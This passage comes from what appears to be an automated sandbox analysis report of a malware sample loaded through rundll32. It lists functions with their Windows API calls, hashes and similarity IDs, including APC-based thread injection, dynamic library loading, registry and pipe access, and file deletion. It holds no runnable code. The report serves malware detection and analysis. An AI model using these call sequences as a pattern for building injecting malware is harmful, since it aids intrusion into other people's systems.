                                                            • Part of subcall function 0628E3CD: RtlEnterCriticalSection.NTDLL(0629A428), ref: 0628E41A
                                                            • Part of subcall function 0628E3CD: RtlLeaveCriticalSection.NTDLL(0629A428), ref: 0628E42F
                                                            • Part of subcall function 0628E3CD: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0628E467
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                                                          • String ID:
                                                          • API String ID: 4198405257-0
                                                          • Opcode ID: 4935230cddf2f052ec19957558926eccc61307e0c142ae9ca1903fc2c8ded6f7
                                                          • Instruction ID: 9da59b7b4613965473738e124cb2f3102c48d0767bb32d37c4d8ddab991c0adf
                                                          • Opcode Fuzzy Hash: 4935230cddf2f052ec19957558926eccc61307e0c142ae9ca1903fc2c8ded6f7
                                                          • Instruction Fuzzy Hash: 5C616B71A1120AEFCF50DFA5EC88E9A7BAAFF88704F044429ED1597250D7749A54CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06288CF3 Relevance: 15.1, APIs: 10, Instructions: 110librarymemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(?,?,00000000,00000000,?,00000001,?,?,?,?,?,?,?,06279100,?), ref: 06288D13
                                                          • TlsAlloc.KERNEL32(?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288D1D
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288D46
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288D54
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288D62
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288D70
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288D7E
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288D8C
                                                          • ___HrLoadAllImportsForDll@4.DELAYIMP ref: 06288DB6
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,?,?,?,?,?,?,?,?,06279100,?), ref: 06288E37
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load$Library$AllocDll@4FreeHeapImports
                                                          • String ID:
                                                          • API String ID: 1792504554-0
                                                          • Opcode ID: aca6acb66a82f6ad7a38677ced27a3cdba08840c8270ded52eefce656ed13967
                                                          • Instruction ID: 6fecfa621932c17632b0c37d4a3358ecb8515064aadfbffc15c830e3d3f042ee
                                                          • Opcode Fuzzy Hash: aca6acb66a82f6ad7a38677ced27a3cdba08840c8270ded52eefce656ed13967
                                                          • Instruction Fuzzy Hash: 8B418E71E11319AFCB40EFA8EC88D9AB7FDFB89204B544466EA05DB240D738A944CF70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628E8BB Relevance: 15.1, APIs: 10, Instructions: 98filememorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06272F91: memset.NTDLL ref: 06272FB3
                                                            • Part of subcall function 06272F91: CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0627305D
                                                          • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 0628E903
                                                          • CloseHandle.KERNEL32(?), ref: 0628E90F
                                                          • PathFindFileNameW.SHLWAPI(?), ref: 0628E91F
                                                          • lstrlenW.KERNEL32(00000000), ref: 0628E928
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0628E939
                                                          • wcstombs.NTDLL ref: 0628E948
                                                          • lstrlen.KERNEL32(?), ref: 0628E955
                                                          • UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?), ref: 0628E994
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628E9A7
                                                          • DeleteFileW.KERNEL32(?), ref: 0628E9B4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                                                          • String ID:
                                                          • API String ID: 2256351002-0
                                                          • Opcode ID: ae6089b3e84138973655d8e158a893c5e218c41d7fbd86f159bea807088769d5
                                                          • Instruction ID: 1bd6a7485c892397a795c482e066f48b5ab0476ed4a425b94d1894b4e182da7b
                                                          • Opcode Fuzzy Hash: ae6089b3e84138973655d8e158a893c5e218c41d7fbd86f159bea807088769d5
                                                          • Instruction Fuzzy Hash: 82319C31A11209EFDB62AFA5EC4CE9F3BBAEF88304F004024FE41A2190DB719914DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628B9E9 Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 0628B9F9
                                                          • CreateFileW.KERNEL32(06280971,80000000,00000003,0629A1E8,00000003,00000000,00000000,?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BA16
                                                          • GetLastError.KERNEL32(?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BABE
                                                            • Part of subcall function 0629087A: lstrlen.KERNEL32(?,00000000,0628BA3E,00000027,0629A1E8,?,00000000,?,?,0628BA3E,?,00000001,?,06280971,00000000,?), ref: 062908B0
                                                            • Part of subcall function 0629087A: lstrcpy.KERNEL32(00000000,00000000), ref: 062908D4
                                                            • Part of subcall function 0629087A: lstrcat.KERNEL32(00000000,00000000), ref: 062908DC
                                                          • GetFileSize.KERNEL32(06280971,00000000,?,00000001,?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BA49
                                                          • CreateFileMappingA.KERNEL32(06280971,0629A1E8,00000002,00000000,00000000,06280971), ref: 0628BA5D
                                                          • lstrlen.KERNEL32(06280971,?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BA79
                                                          • lstrcpy.KERNEL32(?,06280971), ref: 0628BA89
                                                          • GetLastError.KERNEL32(?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BA91
                                                          • HeapFree.KERNEL32(00000000,06280971,?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BAA4
                                                          • CloseHandle.KERNEL32(06280971,?,00000001,?,06280971), ref: 0628BAB6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                                                          • String ID:
                                                          • API String ID: 194907169-0
                                                          • Opcode ID: 26f22743f33efad8b2b4d2e29da0da91b46d530088242ec3be4ee752612c1bd7
                                                          • Instruction ID: 8eade95f043c8dedd8155cf5f4b5a5007b205a6da7c39e4e5d0392972d9257ed
                                                          • Opcode Fuzzy Hash: 26f22743f33efad8b2b4d2e29da0da91b46d530088242ec3be4ee752612c1bd7
                                                          • Instruction Fuzzy Hash: F5210A71901308FFDB119FA4EC49A9D7FB9FB48355F108469FA15A6250D3708A54DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627EE04 Relevance: 15.1, APIs: 10, Instructions: 68threadprocesslibraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 0627EE2A
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0627EE36
                                                          • GetModuleHandleA.KERNEL32(?,0689978E,00000000,?,00000000), ref: 0627EE56
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0627EE5D
                                                          • Thread32First.KERNEL32(?,0000001C), ref: 0627EE6D
                                                          • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 0627EE88
                                                          • QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 0627EE99
                                                          • CloseHandle.KERNEL32(00000000), ref: 0627EEA0
                                                          • Thread32Next.KERNEL32(?,0000001C), ref: 0627EEA9
                                                          • CloseHandle.KERNEL32(?), ref: 0627EEB5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                                                          • String ID:
                                                          • API String ID: 2341152533-0
                                                          • Opcode ID: 463f1faa87218ce4b7d039275d12722162acb950e0d5a434fd244b9b9e82b8a0
                                                          • Instruction ID: 66e82fcd07a79fd9423879ed8c1b4b2bfd959b8882fa0c9a36dfba22b2dd1372
                                                          • Opcode Fuzzy Hash: 463f1faa87218ce4b7d039275d12722162acb950e0d5a434fd244b9b9e82b8a0
                                                          • Instruction Fuzzy Hash: 83216D72A1020DBFDF41AFA4EC88CEE7BB9FB89355B004529FA11A6190D7709955CFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627DC41 Relevance: 15.1, APIs: 10, Instructions: 59sleepsynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetEvent.KERNEL32(00000000,?,0628507B), ref: 0627DC56
                                                            • Part of subcall function 06285D52: InterlockedExchange.KERNEL32(?,000000FF), ref: 06285D59
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,0628507B), ref: 0627DC76
                                                          • CloseHandle.KERNEL32(00000000,?,0628507B), ref: 0627DC7F
                                                          • CloseHandle.KERNEL32(00000000,?,?,0628507B), ref: 0627DC89
                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 0627DC91
                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 0627DCA9
                                                          • Sleep.KERNEL32(000001F4), ref: 0627DCB8
                                                          • CloseHandle.KERNEL32(00000000), ref: 0627DCC5
                                                          • LocalFree.KERNEL32(?), ref: 0627DCD0
                                                          • RtlDeleteCriticalSection.NTDLL(?), ref: 0627DCDA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 1408595562-0
                                                          • Opcode ID: 5eb522b97bbf5f5d174b71f50972b2e367d2df94946af7a06598823f64b39a70
                                                          • Instruction ID: 0f198351ccf604fcac2a4d0fee19e6ceb794492a998964375950ce059252ef2f
                                                          • Opcode Fuzzy Hash: 5eb522b97bbf5f5d174b71f50972b2e367d2df94946af7a06598823f64b39a70
                                                          • Instruction Fuzzy Hash: 3E118F71620716DFCB616F65ED48D5AB7A9BF447463000D18EA82A2490DB71E440CF70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627DD7B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,06273DA2,00000000,00000001,?,?,?), ref: 0627DD92
                                                          • lstrlen.KERNEL32(?), ref: 0627DDA2
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0627DDD6
                                                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 0627DE01
                                                          • memcpy.NTDLL(00000000,?,?), ref: 0627DE20
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0627DE81
                                                          • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 0627DEA3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Allocatelstrlenmemcpy$Free
                                                          • String ID: W
                                                          • API String ID: 3204852930-655174618
                                                          • Opcode ID: 90d7a6df6978853b77f158f2010c2f9637da5fa692ce1c547b34f2f4740480c3
                                                          • Instruction ID: fd9b9e1a9c6db93624eb10fc3c6be3a9f25498702ce1b4bcd7c736f83285e732
                                                          • Opcode Fuzzy Hash: 90d7a6df6978853b77f158f2010c2f9637da5fa692ce1c547b34f2f4740480c3
                                                          • Instruction Fuzzy Hash: 7941287191020EEFDF528F55DC84EAEBBB9FF54244F144829ED14A7210E7319A54DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627A107 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 107stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0627D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0628DD0F,00000000,00000000,00000004,00000000,?,0627DBAC,?,?,00000000), ref: 0627D435
                                                            • Part of subcall function 0627D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0628DD0F,00000000,00000000,00000004,00000000,?,0627DBAC,?), ref: 0627D493
                                                            • Part of subcall function 0627D429: lstrcpy.KERNEL32(00000000,00000000), ref: 0627D4A3
                                                          • lstrlen.KERNEL32(00000008,?,?,00000000,00000004,00000000), ref: 0627A153
                                                          • wsprintfA.USER32 ref: 0627A181
                                                          • lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 0627A1DF
                                                          • GetLastError.KERNEL32 ref: 0627A1F6
                                                          • ResetEvent.KERNEL32(?), ref: 0627A20A
                                                          • ResetEvent.KERNEL32(?), ref: 0627A20F
                                                          • GetLastError.KERNEL32 ref: 0627A227
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$ErrorEventLastReset$lstrcpymemcpywsprintf
                                                          • String ID: `
                                                          • API String ID: 2276693960-1850852036
                                                          • Opcode ID: 9bec6965f57b4d8a58c4b32cec8d7b2b4fd7b36e757058d586ee29cfc4d4f5f1
                                                          • Instruction ID: 0c3d998732c75001712833c0d64e5707f76545264fc3cd45b252e831a8e68eb7
                                                          • Opcode Fuzzy Hash: 9bec6965f57b4d8a58c4b32cec8d7b2b4fd7b36e757058d586ee29cfc4d4f5f1
                                                          • Instruction Fuzzy Hash: 1741597192020AAFDF51EFA6EC88F9E7BB9FF48324F100419E911A2150D7319A54DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06273172 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memorystringpipeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(062743C6,00000000,?,?,?,?,062743C6,00000035,00000000,?,00000000), ref: 062731A2
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 062731B8
                                                          • memcpy.NTDLL(00000010,062743C6,00000000,?,?,062743C6,00000035,00000000), ref: 062731EE
                                                          • memcpy.NTDLL(00000010,00000000,00000035,?,?,062743C6,00000035), ref: 06273209
                                                          • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 06273227
                                                          • GetLastError.KERNEL32(?,?,062743C6,00000035), ref: 06273231
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,062743C6,00000035), ref: 06273254
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                                                          • String ID: (
                                                          • API String ID: 2237239663-3887548279
                                                          • Opcode ID: 2667112a87208e697eb9a544d988c039f7abc41e4310e40fd76c3205fb0b3b80
                                                          • Instruction ID: c1d6d1ae3de67b0a8a1a558686545fc1a226a65367e0f582c8aeeccda1ab55d0
                                                          • Opcode Fuzzy Hash: 2667112a87208e697eb9a544d988c039f7abc41e4310e40fd76c3205fb0b3b80
                                                          • Instruction Fuzzy Hash: 05318236A1030AEFDB61CF95EC45E9B7BB9FF84754F044425FE45E2210D2309955DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627EC00 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87registrylibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0627EC1B
                                                          • RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0627ECD3
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0627EC69
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0627EC82
                                                          • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0627ECA1
                                                          • FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 0627ECB3
                                                          • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0627ECBB
                                                          Strings
                                                          • Software\Microsoft\WAB\DLLPath, xrefs: 0627EC0C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                                                          • String ID: Software\Microsoft\WAB\DLLPath
                                                          • API String ID: 1628847533-3156921957
                                                          • Opcode ID: 6754ead00346d7d1b8095de9d2d91ff1c68129f32fca5cc2d46612dd7cc9948a
                                                          • Instruction ID: a592176479eeffe80b4d4fe787a918c211cfc7d383edb1d13f82de47d4aa3812
                                                          • Opcode Fuzzy Hash: 6754ead00346d7d1b8095de9d2d91ff1c68129f32fca5cc2d46612dd7cc9948a
                                                          • Instruction Fuzzy Hash: A321E775D10215FFDB51AB69EC48C9EBF79EB84211B1501A9FD41A3160D2714E40CBB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06287736 Relevance: 13.7, APIs: 9, Instructions: 168memorythreadsleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL ref: 06287777
                                                          • memset.NTDLL ref: 0628778B
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F02
                                                            • Part of subcall function 06291ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 06291F16
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F30
                                                            • Part of subcall function 06291ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,06272C89,?,?,?), ref: 06291F5A
                                                          • GetCurrentThreadId.KERNEL32 ref: 06287818
                                                          • GetCurrentThread.KERNEL32 ref: 0628782B
                                                          • RtlEnterCriticalSection.NTDLL(0689C2D0), ref: 062878D2
                                                          • Sleep.KERNEL32(0000000A), ref: 062878DC
                                                          • RtlLeaveCriticalSection.NTDLL(0689C2D0), ref: 06287902
                                                          • HeapFree.KERNEL32(00000000,?), ref: 06287930
                                                          • HeapFree.KERNEL32(00000000,00000018), ref: 06287943
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                                                          • String ID:
                                                          • API String ID: 1146182784-0
                                                          • Opcode ID: 177bc148551a0a005de7777e1cf3aabc3d7ba9b35162bbb083950832000a1aab
                                                          • Instruction ID: 140b7c2f374689c294719d3a3324be7cec35f92b5d04ff1b7b37a8a46712f24d
                                                          • Opcode Fuzzy Hash: 177bc148551a0a005de7777e1cf3aabc3d7ba9b35162bbb083950832000a1aab
                                                          • Instruction Fuzzy Hash: 805138B1915342AFD791EF64EC8481ABBE9FB88244F104C2DFA95D7250D334DA48DFA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06282812 Relevance: 13.6, APIs: 9, Instructions: 130memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 062870C3: RtlEnterCriticalSection.NTDLL(0629A428), ref: 062870CB
                                                            • Part of subcall function 062870C3: RtlLeaveCriticalSection.NTDLL(0629A428), ref: 062870E0
                                                            • Part of subcall function 062870C3: InterlockedIncrement.KERNEL32(0000001C), ref: 062870F9
                                                          • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 0628284F
                                                          • memset.NTDLL ref: 06282860
                                                          • lstrcmpi.KERNEL32(?,?), ref: 062828A0
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 062828CC
                                                          • memcpy.NTDLL(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,06288974), ref: 062828E0
                                                          • memset.NTDLL ref: 062828ED
                                                          • memcpy.NTDLL(-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 06282906
                                                          • memcpy.NTDLL(-00000005,?,00000007,-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 06282929
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,06288974), ref: 06282946
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                                                          • String ID:
                                                          • API String ID: 694413484-0
                                                          • Opcode ID: ef137c23937141551ed4133b85c8d68ecfe983b618dd8b40a2fccbf2496b0bb1
                                                          • Instruction ID: 07de83c3e5bf21713efac1e1f62300d520069a81f997e2edea2a697ae52d7084
                                                          • Opcode Fuzzy Hash: ef137c23937141551ed4133b85c8d68ecfe983b618dd8b40a2fccbf2496b0bb1
                                                          • Instruction Fuzzy Hash: D941C471E1131AEFDF50AFA4DC88B9D7BB9EF48314F148429E914A7290D7359A44CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628C9B5 Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0628C9CC
                                                          • lstrlen.KERNEL32(?), ref: 0628C9D4
                                                          • lstrlen.KERNEL32(?), ref: 0628CA3F
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0628CA6A
                                                          • memcpy.NTDLL(00000000,00000002,?), ref: 0628CA7B
                                                          • memcpy.NTDLL(00000000,?,?), ref: 0628CA91
                                                          • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 0628CAA3
                                                          • memcpy.NTDLL(00000000,062953E8,00000002,00000000,?,?,00000000,?,?), ref: 0628CAB6
                                                          • memcpy.NTDLL(00000000,?,00000002), ref: 0628CACB
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memcpy$lstrlen$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 3386453358-0
                                                          • Opcode ID: b471072004dc39e2e68417f9ed7f42f2eb78479d6ff081fb91ffe6b9c58ad938
                                                          • Instruction ID: 5c3a763a6d112311c02340ed4542952908b301ed27ee85b424e38667b63af339
                                                          • Opcode Fuzzy Hash: b471072004dc39e2e68417f9ed7f42f2eb78479d6ff081fb91ffe6b9c58ad938
                                                          • Instruction Fuzzy Hash: 2E416D72E1020AEFCF41DFA8DC84A9EBBB9EF48214F144456ED15A3241E771EA50CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627605B Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 062870C3: RtlEnterCriticalSection.NTDLL(0629A428), ref: 062870CB
                                                            • Part of subcall function 062870C3: RtlLeaveCriticalSection.NTDLL(0629A428), ref: 062870E0
                                                            • Part of subcall function 062870C3: InterlockedIncrement.KERNEL32(0000001C), ref: 062870F9
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 062760AC
                                                          • lstrlen.KERNEL32(00000008,?,?,?,0628F140,00000000,00000000,-00000008), ref: 062760BB
                                                          • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 062760CD
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,0628F140,00000000,00000000,-00000008), ref: 062760DD
                                                          • memcpy.NTDLL(00000000,-00000008,00000000,?,?,?,0628F140,00000000,00000000,-00000008), ref: 062760EF
                                                          • lstrcpy.KERNEL32(00000020), ref: 06276121
                                                          • RtlEnterCriticalSection.NTDLL(0629A428), ref: 0627612D
                                                          • RtlLeaveCriticalSection.NTDLL(0629A428), ref: 06276185
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3746371830-0
                                                          • Opcode ID: dd985c4a9a4742bbdf2d02709a4fe656952d21c4d8a4e0b2b93507ffaaa47456
                                                          • Instruction ID: 71ef622cb0d2acf245dfda7acaaeb756b942b1f868d87f43a1ac38dfe3fe64f8
                                                          • Opcode Fuzzy Hash: dd985c4a9a4742bbdf2d02709a4fe656952d21c4d8a4e0b2b93507ffaaa47456
                                                          • Instruction Fuzzy Hash: 26418B71920B06EFDB618F54E848B5ABBFAFF88314F108419ED0993201DB71E954CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628FBF1 Relevance: 13.6, APIs: 9, Instructions: 105memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06285119: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0628514B
                                                            • Part of subcall function 06285119: HeapFree.KERNEL32(00000000,00000000,?,?,0628FC0D,?,00000022,00000000,00000000,00000000,?,?), ref: 06285170
                                                            • Part of subcall function 062879A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0628FC2E,?,?,?,?,?,00000022,00000000,00000000), ref: 062879DC
                                                            • Part of subcall function 062879A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,0628FC2E,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 06287A2F
                                                          • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0628FC63
                                                          • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0628FC6B
                                                          • lstrlen.KERNEL32(?), ref: 0628FC75
